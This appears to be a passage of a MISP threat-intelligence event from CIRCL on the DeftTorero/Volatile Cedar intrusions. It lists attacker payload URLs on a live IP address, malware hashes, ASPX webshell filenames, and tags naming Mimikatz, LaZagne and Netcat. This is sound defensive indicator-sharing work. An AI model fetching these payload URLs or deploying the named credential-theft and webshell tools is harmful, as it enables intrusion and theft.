2023-04-21 13:25:09 +00:00
{
"Event" : {
"analysis" : "0" ,
"date" : "2022-10-03" ,
"extends_uuid" : "" ,
"info" : "DeftTorero: tactics, techniques and procedures of intrusions revealed" ,
"publish_timestamp" : "1666603272" ,
"published" : true ,
"threat_level_id" : "4" ,
"timestamp" : "1665044144" ,
"uuid" : "2e7a515f-c380-4915-a505-9568ccc00d22" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#002b4a" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:source-type=\"technical-report\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#004646" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0071c3" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:lifetime=\"perpetual\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0087e8" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:certainty=\"50\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#ffffff" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "tlp:white" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:malpedia=\"MimiKatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#064800" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Mimikatz\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Netcat\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-intrusion-set=\"Volatile Cedar - G0123\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:threat-actor=\"Volatile Cedar\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
] ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "36fff9ba-3e97-45f2-abd3-b720b7020d4d" ,
"value" : "http://200.159.87.196:3306/jsJ13j.sct"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "e4ae6f13-41ef-4955-9eb5-cf7f7ee45373" ,
"value" : "http://200.159.87.196/made.xn--ps1-to0a"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "8e2e035f-ff9d-48c2-8760-31a59f7a4d07" ,
"value" : "http://200.159.87.196/av.xn--vbs-to0a"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "c8b20fa5-8fb5-4a8d-b69c-c9bc7c0b142a" ,
"value" : "http://200.159.87.196/1.msi"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "6eb65ccf-abf8-4d91-8b13-9e13234e3b4c" ,
"value" : "f0e6510103deefce338777a81cbfb7529eefa69bafad0d6fd63b4944f916c076"
} ,
{
"category" : "Payload delivery" ,
"comment" : "HackTool:Win32/LaZagne" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "87f605fa-69e0-4035-952e-024d3a1760be" ,
"value" : "ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56"
} ,
{
"category" : "Payload delivery" ,
"comment" : "HackTool:JS/ReGeorg" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "747cf011-44fb-4e11-b299-2a71603ccb94" ,
"value" : "c1f43b7cf46ba12cfc1357b17e4f5af408740af7ae70572c9cf988ac50260ce1"
} ,
{
"category" : "Payload delivery" ,
"comment" : "Trojan:Win32/Pynamer.B!ac" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "210ee4ac-7c7a-4d54-875a-312a3503a755" ,
"value" : "b42725211240828ccc505d193d8ea5915e395c9f43e71496ff0ece4f72e3e4ab"
} ,
{
"category" : "Payload delivery" ,
"comment" : "TEL:SCPT_LCSuspiPSPattern35" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "1cc4cabd-03f9-40b4-a5b7-fee8af302390" ,
"value" : "a16bdcfa4cc73f87f6eea9795acb75b6b40f80e0bba6394b39f37b7b1fd1f4ad"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664888101" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "db592c3e-86e5-49f5-b93f-c8c877eabc60" ,
"value" : "8737f06d7374ff54a9ad728f53c09f89070beca02a305f11fc1e26c8fb33f049"
} ,
{
"category" : "Payload delivery" ,
"comment" : "Explosive RAT EXE" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664891857" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "231b1d67-7f41-4ca5-9d9f-15142756b299" ,
"value" : "53ee31c009e96d4b079ebe3267d0ae8e"
} ,
{
"category" : "Payload delivery" ,
"comment" : "Explosive RAT EXE" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664891857" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "13b201a9-7228-48f4-89fa-8ae9e3316287" ,
"value" : "54ebc45137ba5b9f5ece35ca40267100"
} ,
{
"category" : "Payload delivery" ,
"comment" : "Explosive RAT EXE" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664891857" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "559f1c1b-5ea9-4cb7-8635-eff4b0dbff67" ,
"value" : "a955b45e14d082f71e01ebc52cf13db8"
} ,
{
"category" : "Payload delivery" ,
"comment" : "Explosive RAT EXE" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664891857" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "3c5b75f1-ab87-4271-ba98-d89820fdba9b" ,
"value" : "e952ec767d872ea08d8555cbc162f3dc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "Explosive RAT EXE" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1664891857" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "bda5859a-ba78-49c8-824c-bc5453f43747" ,
"value" : "ed50613683b5a4196e0d5fd2687c56da"
}
] ,
"Object" : [
{
"comment" : "" ,
"deleted" : false ,
"description" : "Metadata used to generate an executive level report" ,
"meta-category" : "misc" ,
"name" : "report" ,
"template_uuid" : "70a68471-df22-4e3f-aa1a-5a3be19f82df" ,
"template_version" : "7" ,
"timestamp" : "1664962552" ,
"uuid" : "1a66ee6b-c9bc-4567-b3c8-85592349e44e" ,
"Attribute" : [
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "link" ,
"timestamp" : "1664962533" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "49f85d63-6572-408d-8617-a1b94cf303b5" ,
"value" : "https://otx.alienvault.com/pulse/633acb17ed56f34d3779a9a4"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "link" ,
"timestamp" : "1664962533" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "49032ca0-1735-4250-acaf-cfe07fba999b" ,
"value" : "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "type" ,
"timestamp" : "1664962533" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "68f89fe7-3c76-4085-8841-26168b11c786" ,
"value" : "Online"
}
]
} ,
{
"comment" : "basic ASPX webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664892131" ,
"uuid" : "a973cd15-c719-4c43-baed-389d38f35d95" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664892131" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "58345ca3-69bc-4007-8b17-efa08301664f" ,
"value" : "0a45de1cdf39e0ad67f5d88c730b433a" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664892070" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "acc3a9e8-3ae3-404f-a398-586bcbde837e" ,
"value" : "cmd.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "Tunna webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962533" ,
"uuid" : "fdb14fbf-8855-4433-86a4-7f37d4dc298a" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "654ebfdd-406d-4082-a730-693404e6ccd9" ,
"value" : "0d6bc7b184f9e1908d4d3fe0a7038a1e" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "dd2ba74c-ff8a-4449-bdb2-e71888d102d6" ,
"value" : "c.aspx/conn.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "ASPX webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962533" ,
"uuid" : "525451ee-62dd-43d8-a8b7-55abd922adc7" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "01a93c42-86c6-4042-89f9-b3880cff3e23" ,
"value" : "c87a206a9c9846a2d1c3537d459ec03a" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "e9af7187-9e0d-4ddf-9b1b-7e3868291595" ,
"value" : "the.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "Devel webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962533" ,
"uuid" : "c06eacaa-7f97-4d84-99e5-a52624bde69a" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "cf8ea2e0-0974-4808-a6d3-fec22eb8c0d8" ,
"value" : "02bcd71a4d7c3a366eff733f92702b81" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "7a58db6b-b8ba-46eb-84f7-2975bfd4c7d4" ,
"value" : "devel.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "reGeorg webshell\r\n" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962533" ,
"uuid" : "9b5e4f23-aaa3-4904-8697-8ffb60580067" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "de90d446-2d94-46e0-b418-09778419174e" ,
"value" : "d6a82b866f7f9e1e01bf89c3da106d9d" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "fc390f3c-888e-4504-99d3-51e5bd27f3e4" ,
"value" : "Banner.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962533" ,
"uuid" : "d2de8e0f-ac72-47d1-8de8-f4843d91970d" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "deeed8c5-39e2-45fd-89a8-3a7cba559cfa" ,
"value" : "c59870690803d976014c7c8b58659ddf" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "69647e0c-c577-4db5-be46-3bd6d2820216" ,
"value" : "03831a5291724ef2060127f19206eiab.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "Caterpillar webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962533" ,
"uuid" : "2adbdbd0-5cf9-4142-bc43-0bf7ff1c890d" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "a5573421-319a-4c7f-9db6-0c94b838f69d" ,
"value" : "1ed9169bed85efb1fd5f8d50333252d8" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "0579ba64-f209-463f-9e77-619ba27c7ff8" ,
"value" : "aram.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "Caterpillar webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962533" ,
"uuid" : "5bfc7b92-0962-44ee-a4ed-d5640e1cd6a1" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "d35e1b38-6d2a-430f-86d5-dc1d905f4586" ,
"value" : "2d804386de4073bad642dfc816876d08" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962533" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "937fbcc8-1954-43f3-a900-8346b734c381" ,
"value" : "Pavos.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "ASPX webshell\r\n" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962532" ,
"uuid" : "d992ce91-b710-4f38-ac8c-36e6183d1543" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "76e4d784-42ca-4092-a172-b20333549855" ,
"value" : "523aa999b9270b382968e5c24ab6f9eb" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "b27d7bb8-34ee-4d9e-8ad6-06524d033f4e" ,
"value" : "Report_21.jpg" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "ASPXSpy webshell" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962532" ,
"uuid" : "c4fc319e-0659-4a8a-8cbb-18b2eba56ac1" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "cc54f63c-f264-4fc7-a55e-70ef9210588e" ,
"value" : "aspxspy2014final.aspx" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "e6467a2e-b645-49ba-bf0e-ccf62a1f9ba2" ,
"value" : "45d854e66631e5c1cda6dbf4fea074ce" ,
"Tag" : [
{
"colour" : "#4c3011" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cccs:malware_classification=\"webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#825600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cert-ist:malware_type=\"Webshell\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
}
]
} ,
{
"comment" : "Sec4ever webshell\r\n" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1664962532" ,
"uuid" : "f41e258b-608d-49e7-b38b-df2321e2fe0d" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1664962532" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "46436a94-ade1-4719-a3c1-073050108421" ,
"value" : "bb767354ee886f69b4ab4f9b4ac6b660" ,
"Tag" : [
{
"colour" : "#4c3011" ,
